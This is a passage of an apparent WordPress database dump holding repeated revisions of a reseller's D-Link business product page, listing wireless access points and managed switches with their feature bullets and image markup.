/>â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 12:58:25','2019-09-25 04:58:25','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3386,1,'2019-09-25 12:59:15','2019-09-25 04:59:15','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<h4 style=\"text-align: center;\">Enjoy High-performance Wireless Connectivity</h4><p style=\"text-align: left;\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><h4 style=\"text-align: center;\">MU-MIMO with Beamforming</h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><h4 style=\"text-align: center;\">Multiple Operational Modes</h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>High-speed wireless performance with 300 Mbps wireless signal rates</p><p>Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>Support Inbuilt Radius server, Network Access protection (NAP)</p><p>Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 12:59:15','2019-09-25 04:59:15','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3387,1,'2019-09-25 14:21:58','2019-09-25 06:21:58','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<h4 style=\"text-align: center;\">Enjoy High-performance Wireless Connectivity</h4><p style=\"text-align: left;\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><h4 style=\"text-align: center;\">MU-MIMO with Beamforming</h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><h4 style=\"text-align: center;\">Multiple Operational Modes</h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg\" alt=\"\" 